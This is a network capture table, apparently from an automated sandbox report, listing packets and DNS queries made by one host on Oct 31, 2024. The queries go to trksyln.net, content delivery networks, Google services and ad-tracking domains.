Oct 31, 2024 19:20:53.383351088 CET	51523	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.383358002 CET	443	51523	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.512949944 CET	443	51523	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.513093948 CET	443	51523	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.513153076 CET	51523	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.513319016 CET	51523	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.513329983 CET	443	51523	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.513340950 CET	51523	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.513345957 CET	443	51523	13.107.246.45	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 19:19:17.580025911 CET	64589	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:17.580267906 CET	64097	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:17.621695042 CET	53	64589	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:17.808095932 CET	53	64097	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:17.873091936 CET	53	54480	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:18.649210930 CET	57651	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:18.649547100 CET	64191	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:18.685487986 CET	53	64191	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:18.714517117 CET	53	57651	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:19.301788092 CET	53	56295	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:21.427733898 CET	50278	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:21.427917004 CET	61486	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:21.671129942 CET	53	61486	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:21.671149969 CET	53	50278	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:22.106627941 CET	61189	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:22.107126951 CET	63028	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:22.107896090 CET	63928	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:22.108364105 CET	49746	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:22.108922005 CET	51880	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:22.109488010 CET	58511	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:22.111974955 CET	53	53617	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:22.113415956 CET	53	61189	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:22.114166975 CET	53	63028	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:22.114619017 CET	53	63928	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:22.114789009 CET	53	49746	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:22.116142988 CET	53	58511	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:22.315243959 CET	138	138	192.168.2.4	192.168.2.255
Oct 31, 2024 19:19:23.291361094 CET	52603	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:23.291982889 CET	59478	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:23.304461956 CET	64746	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:23.304599047 CET	58634	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:23.309288025 CET	53	61806	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:23.311299086 CET	53	58634	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:23.311322927 CET	53	64746	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:24.012743950 CET	55680	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:24.013465881 CET	55316	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:24.020520926 CET	53	55680	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:24.020546913 CET	53	55316	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:24.060787916 CET	62313	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:24.061096907 CET	53611	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:24.067806005 CET	53	62313	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:24.067866087 CET	53	53611	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.116739035 CET	53	59009	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.486825943 CET	51162	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.486972094 CET	55436	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.488500118 CET	56903	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.488646984 CET	53168	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.489399910 CET	57025	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.489571095 CET	60579	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.490055084 CET	49624	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.490184069 CET	57758	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.493745089 CET	53	51162	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.493757963 CET	53	55436	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.496603012 CET	53	57025	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.496881962 CET	53	60579	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.496891975 CET	53	49624	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.497433901 CET	53	57758	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.497450113 CET	53	53168	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:25.952150106 CET	62776	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.952378035 CET	51264	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:25.959090948 CET	53	56853	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:26.383169889 CET	53	50487	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:27.895286083 CET	60391	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:27.895876884 CET	64172	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.135073900 CET	53	60391	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.135421038 CET	53	64172	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.237696886 CET	64917	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.237880945 CET	52690	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.269366980 CET	53	52690	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.297065020 CET	53	64917	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.307513952 CET	56716	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.307661057 CET	64397	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.314549923 CET	53	64397	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.318711042 CET	53	56716	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.325536013 CET	49501	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.325750113 CET	55349	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.326827049 CET	56260	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.326971054 CET	50594	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.328980923 CET	58468	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.329194069 CET	58967	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:28.333117008 CET	53	55349	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.333621025 CET	53	56260	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.334065914 CET	53	50594	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.335952997 CET	53	58468	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:28.336941004 CET	53	58967	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:31.729172945 CET	53	63091	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:31.777069092 CET	60115	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:31.777209044 CET	61502	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:31.784216881 CET	53	60115	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:31.784625053 CET	53	61502	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.217365026 CET	62403	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.217519045 CET	64097	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.218015909 CET	60228	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.218323946 CET	51052	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.218797922 CET	63574	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.218923092 CET	55781	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.219387054 CET	64367	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.219748020 CET	62037	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.220428944 CET	65255	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.220576048 CET	53350	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.220983982 CET	63166	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.222795963 CET	56638	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.223330975 CET	56709	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.223834038 CET	63145	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.224870920 CET	60424	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.225244045 CET	53	60228	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.225284100 CET	60008	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.225406885 CET	53	64097	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.226049900 CET	53	63574	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.226062059 CET	53	51052	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.226156950 CET	53	62403	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.226167917 CET	53	55781	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.226528883 CET	53	64367	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.227025986 CET	53	62037	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.228221893 CET	53	63166	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.228341103 CET	53	65255	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.230050087 CET	53	53350	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.230096102 CET	53	56638	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.232635975 CET	53	60424	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.233340025 CET	53	60008	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.350243092 CET	56604	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.350389957 CET	51145	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.350862980 CET	62417	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.351027966 CET	64711	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.351450920 CET	55151	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.351577044 CET	53419	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.352125883 CET	58222	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.352399111 CET	55931	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.353221893 CET	62999	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.353646040 CET	61395	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.354623079 CET	54027	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.354747057 CET	62335	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:33.358098984 CET	53	51145	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.358122110 CET	53	64711	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.359174967 CET	53	58222	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.360515118 CET	53	62999	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.360532045 CET	53	55931	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.361051083 CET	53	61395	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.362588882 CET	53	62335	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:33.365166903 CET	53	54027	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.320527077 CET	53	59653	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.425930977 CET	58633	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.426455975 CET	55710	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.426795959 CET	55270	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.427050114 CET	58296	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.431770086 CET	57209	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.431996107 CET	57705	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.437880993 CET	53	58633	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.437897921 CET	53	55710	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.437947035 CET	51579	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.438236952 CET	51557	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.438437939 CET	53	55270	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.438450098 CET	53	58296	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.440098047 CET	53	57705	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.440330029 CET	53	57209	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.446141005 CET	53	51557	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.449698925 CET	53	51579	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.534204960 CET	51801	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.534476042 CET	64909	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.542999029 CET	56933	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.543137074 CET	64083	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:34.563009977 CET	53	64909	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.563087940 CET	53	51801	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.566597939 CET	53	64083	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:34.566612959 CET	53	56933	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:35.816457033 CET	56029	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:35.816703081 CET	50155	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:35.824080944 CET	53	56029	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:35.824124098 CET	53	50155	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:36.497657061 CET	53	62513	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:38.642309904 CET	61815	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:38.642309904 CET	51107	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:38.649017096 CET	53	51107	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:38.649161100 CET	53	61815	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:39.304431915 CET	53	49389	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:39.715224981 CET	58497	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:39.715365887 CET	63790	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.026063919 CET	55632	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.026256084 CET	55526	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.027798891 CET	54695	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.028063059 CET	59073	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.095069885 CET	57817	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.095362902 CET	60294	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.145904064 CET	53	63790	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.145953894 CET	53	58497	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.154077053 CET	53	59073	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.154146910 CET	53	55526	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.154397964 CET	53	54695	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.155164957 CET	53	55632	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.155177116 CET	53	57817	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.155858040 CET	53	60294	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.175508976 CET	56058	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.175642014 CET	58828	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.182312965 CET	53	56058	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.182795048 CET	53	58828	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.550746918 CET	53	58886	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:41.150079012 CET	50115	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:41.150293112 CET	55509	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:41.365277052 CET	53	50115	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:41.365289927 CET	53	55509	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:41.760759115 CET	53478	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:41.763109922 CET	63845	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:41.771852016 CET	53	53478	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:41.772862911 CET	53	63845	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:45.170942068 CET	52805	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:45.171152115 CET	58362	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:45.178037882 CET	53	58362	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:45.178270102 CET	53	52805	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:54.957349062 CET	63219	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:54.964523077 CET	53	63219	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:56.110932112 CET	63809	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:56.119106054 CET	53	63809	1.1.1.1	192.168.2.4
Oct 31, 2024 19:20:17.403393030 CET	53	57259	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 31, 2024 19:19:17.808166981 CET	192.168.2.4	1.1.1.1	c250	(Port unreachable)	Destination Unreachable
Oct 31, 2024 19:19:31.653559923 CET	192.168.2.4	1.1.1.1	c1fe	(Port unreachable)	Destination Unreachable
Oct 31, 2024 19:19:33.375380039 CET	192.168.2.4	1.1.1.1	c267	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 19:19:17.580025911 CET	192.168.2.4	1.1.1.1	0xfac4	Standard query (0)	www.trksyln.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:17.580267906 CET	192.168.2.4	1.1.1.1	0x55ed	Standard query (0)	www.trksyln.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:18.649210930 CET	192.168.2.4	1.1.1.1	0xc04c	Standard query (0)	trksyln.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:18.649547100 CET	192.168.2.4	1.1.1.1	0xe329	Standard query (0)	trksyln.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:21.427733898 CET	192.168.2.4	1.1.1.1	0x8106	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:21.427917004 CET	192.168.2.4	1.1.1.1	0x2002	Standard query (0)	www.google.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:22.106627941 CET	192.168.2.4	1.1.1.1	0x9f14	Standard query (0)	cdn.jsdelivr.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.107126951 CET	192.168.2.4	1.1.1.1	0x75c9	Standard query (0)	cdn.jsdelivr.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:22.107896090 CET	192.168.2.4	1.1.1.1	0x6f25	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.108364105 CET	192.168.2.4	1.1.1.1	0xca2e	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:22.108922005 CET	192.168.2.4	1.1.1.1	0x41c6	Standard query (0)	kit.fontawesome.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.109488010 CET	192.168.2.4	1.1.1.1	0xc054	Standard query (0)	kit.fontawesome.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:23.291361094 CET	192.168.2.4	1.1.1.1	0x40c7	Standard query (0)	ka-f.fontawesome.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:23.291982889 CET	192.168.2.4	1.1.1.1	0x518d	Standard query (0)	ka-f.fontawesome.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:23.304461956 CET	192.168.2.4	1.1.1.1	0xc500	Standard query (0)	googleads.g.doubleclick.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:23.304599047 CET	192.168.2.4	1.1.1.1	0x2919	Standard query (0)	googleads.g.doubleclick.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:24.012743950 CET	192.168.2.4	1.1.1.1	0x12d4	Standard query (0)	analytics.google.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:24.013465881 CET	192.168.2.4	1.1.1.1	0xf165	Standard query (0)	analytics.google.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:24.060787916 CET	192.168.2.4	1.1.1.1	0xeb33	Standard query (0)	td.doubleclick.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:24.061096907 CET	192.168.2.4	1.1.1.1	0x5100	Standard query (0)	td.doubleclick.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:25.486825943 CET	192.168.2.4	1.1.1.1	0x9fea	Standard query (0)	stats.g.doubleclick.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.486972094 CET	192.168.2.4	1.1.1.1	0xb744	Standard query (0)	stats.g.doubleclick.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:25.488500118 CET	192.168.2.4	1.1.1.1	0xa3eb	Standard query (0)	a.fsdn.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.488646984 CET	192.168.2.4	1.1.1.1	0x9e6b	Standard query (0)	a.fsdn.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:25.489399910 CET	192.168.2.4	1.1.1.1	0x5258	Standard query (0)	upload.wikimedia.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.489571095 CET	192.168.2.4	1.1.1.1	0x82cc	Standard query (0)	upload.wikimedia.org	65	IN (0x0001)	false
Oct 31, 2024 19:19:25.490055084 CET	192.168.2.4	1.1.1.1	0xad59	Standard query (0)	fundingchoicesmessages.google.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.490184069 CET	192.168.2.4	1.1.1.1	0x2468	Standard query (0)	fundingchoicesmessages.google.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:25.952150106 CET	192.168.2.4	1.1.1.1	0x8c76	Standard query (0)	ka-f.fontawesome.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.952378035 CET	192.168.2.4	1.1.1.1	0x1786	Standard query (0)	ka-f.fontawesome.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:27.895286083 CET	192.168.2.4	1.1.1.1	0x2545	Standard query (0)	googleads.g.doubleclick.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:27.895876884 CET	192.168.2.4	1.1.1.1	0xef95	Standard query (0)	googleads.g.doubleclick.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:28.237696886 CET	192.168.2.4	1.1.1.1	0xb8c3	Standard query (0)	trksyln.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.237880945 CET	192.168.2.4	1.1.1.1	0xdaaf	Standard query (0)	trksyln.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:28.307513952 CET	192.168.2.4	1.1.1.1	0xc163	Standard query (0)	cdn.jsdelivr.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.307661057 CET	192.168.2.4	1.1.1.1	0x905	Standard query (0)	cdn.jsdelivr.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:28.325536013 CET	192.168.2.4	1.1.1.1	0xf3e7	Standard query (0)	a.fsdn.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.325750113 CET	192.168.2.4	1.1.1.1	0x6df1	Standard query (0)	a.fsdn.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:28.326827049 CET	192.168.2.4	1.1.1.1	0xff1d	Standard query (0)	upload.wikimedia.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.326971054 CET	192.168.2.4	1.1.1.1	0xb1b9	Standard query (0)	upload.wikimedia.org	65	IN (0x0001)	false
Oct 31, 2024 19:19:28.328980923 CET	192.168.2.4	1.1.1.1	0x2804	Standard query (0)	fundingchoicesmessages.google.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.329194069 CET	192.168.2.4	1.1.1.1	0xa1af	Standard query (0)	fundingchoicesmessages.google.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:31.777069092 CET	192.168.2.4	1.1.1.1	0x2e5b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:31.777209044 CET	192.168.2.4	1.1.1.1	0xac0a	Standard query (0)	www.google.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.217365026 CET	192.168.2.4	1.1.1.1	0xbf0a	Standard query (0)	um.simpli.fi	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.217519045 CET	192.168.2.4	1.1.1.1	0xd2ef	Standard query (0)	um.simpli.fi	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.218015909 CET	192.168.2.4	1.1.1.1	0x381	Standard query (0)	sync.ipredictive.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.218323946 CET	192.168.2.4	1.1.1.1	0x9b04	Standard query (0)	sync.ipredictive.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.218797922 CET	192.168.2.4	1.1.1.1	0x7c1	Standard query (0)	odr.mookie1.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.218923092 CET	192.168.2.4	1.1.1.1	0x7b22	Standard query (0)	odr.mookie1.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.219387054 CET	192.168.2.4	1.1.1.1	0x9290	Standard query (0)	s.uuidksinc.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.219748020 CET	192.168.2.4	1.1.1.1	0xe633	Standard query (0)	s.uuidksinc.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.220428944 CET	192.168.2.4	1.1.1.1	0x6db5	Standard query (0)	dsp.adkernel.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.220576048 CET	192.168.2.4	1.1.1.1	0x7658	Standard query (0)	dsp.adkernel.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.220983982 CET	192.168.2.4	1.1.1.1	0xaafc	Standard query (0)	bh.contextweb.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.222795963 CET	192.168.2.4	1.1.1.1	0xb54a	Standard query (0)	bh.contextweb.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.223330975 CET	192.168.2.4	1.1.1.1	0x24bc	Standard query (0)	www.temu.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.223834038 CET	192.168.2.4	1.1.1.1	0xb4b9	Standard query (0)	www.temu.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.224870920 CET	192.168.2.4	1.1.1.1	0x10e6	Standard query (0)	cm.g.doubleclick.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.225284100 CET	192.168.2.4	1.1.1.1	0xe466	Standard query (0)	cm.g.doubleclick.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.350243092 CET	192.168.2.4	1.1.1.1	0x6bcb	Standard query (0)	dclk-match.dotomi.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.350389957 CET	192.168.2.4	1.1.1.1	0xa329	Standard query (0)	dclk-match.dotomi.com	65	IN (0x0001)	false
